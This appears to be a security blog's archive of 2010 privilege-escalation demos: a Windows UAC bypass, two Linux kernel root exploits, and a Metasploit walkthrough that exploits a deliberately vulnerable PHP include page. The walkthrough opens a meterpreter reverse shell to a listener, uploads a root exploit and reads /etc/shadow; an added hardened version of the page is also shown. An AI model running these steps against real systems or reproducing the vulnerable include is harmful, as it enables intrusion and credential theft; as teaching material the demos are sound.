Tag Archives: Kernel

MS11-011 : Windows UAC Bypass 0day

Timeline :

Vulnerability released by noobpwnftw on 2010-11-24

PoC provided by :

noobpwnftw

Reference(s) :

CVE-2010-4398
EDB-ID 15609
MS11-011

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows 7 Integral

Description :

Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.

Commands :

whoami
poc.exe
whoami

full-nelson.c Linux Kernel local privilege escalation

Timeline :

CVE-2010-3849 reported by Nelson Elhage on 2010-10-18
CVE-2010-3850 reported by Nelson Elhage on 2010-10-18
CVE-2010-4258 reported by Nelson Elhage on 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux kernel versions prior to 2.6.37

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
id
gcc full-nelson.c -o full-nelson
./full-nelson
id

Remote File Inclusion and privilege escalation through Metasploit

Demonstration of an RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
// Intentionally vulnerable demo page: the COLOR request parameter
// flows unchecked into require(), so with allow_url_include enabled
// an attacker can make the server include a remote file.
$color = 'blue';
if (isset($_REQUEST['COLOR'])) {
    $color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1
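For comparison, here is a hardened version of the same page. This is an added example, not code from the original post: it keeps the "pick a colour theme" feature but maps the request value onto a fixed allowlist of local files, so user input never reaches require() as a path. The theme names and file names are assumptions for illustration.

```php
<?php
// Added defensive example (not part of the original post).
// Same feature as the demo page, but the request parameter is only ever
// used as a lookup key, never as part of an include path.

// Allowlist of accepted values -> real files in this directory (assumed names).
$themes = [
    'blue'  => 'blue.php',
    'red'   => 'red.php',
    'green' => 'green.php',
];

// Returns the allowlisted file for the requested theme, or the default one
// when the value is missing or not in the allowlist.
function resolve_theme(array $themes, ?string $requested, string $default = 'blue'): string
{
    if ($requested === null || !array_key_exists($requested, $themes)) {
        return $themes[$default];
    }
    return $themes[$requested];
}

// Read only from the query string; $_REQUEST also accepts POST bodies and
// cookies, which widens the input surface for no benefit here.
$requested = isset($_GET['COLOR']) ? (string) $_GET['COLOR'] : null;

// Anchor the include to this script's own directory. Because the file name
// comes from the allowlist, neither a remote URL nor a traversal sequence
// can be injected into the path.
$file = __DIR__ . '/' . resolve_theme($themes, $requested);

require $file;
```

Two configuration-level mitigations complement the code change: set allow_url_include=Off (and, unless the application needs it, allow_url_fopen=Off) in php.ini so that require() cannot fetch remote resources at all, and review web server access logs for request parameters carrying URL schemes such as http:// or ftp://, which is what the Metasploit module's XXpathXX substitution produces on the wire.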

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

lpwd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow

Video demonstration

CVE-2010-3904: Linux RDS Protocol Local Privilege Escalation

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability disclosed to the vendor on 2010-10-13
Coordinated vulnerability disclosure on 2010-10-19

PoC provided by :

Dan Rosenberg

Reference(s) :

CVE-2010-3904

Affected version(s) :

Kernel Linux 2.6.30 to 2.6.36-rc8

Tested on Ubuntu 10.04

Description :

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.

Demonstration :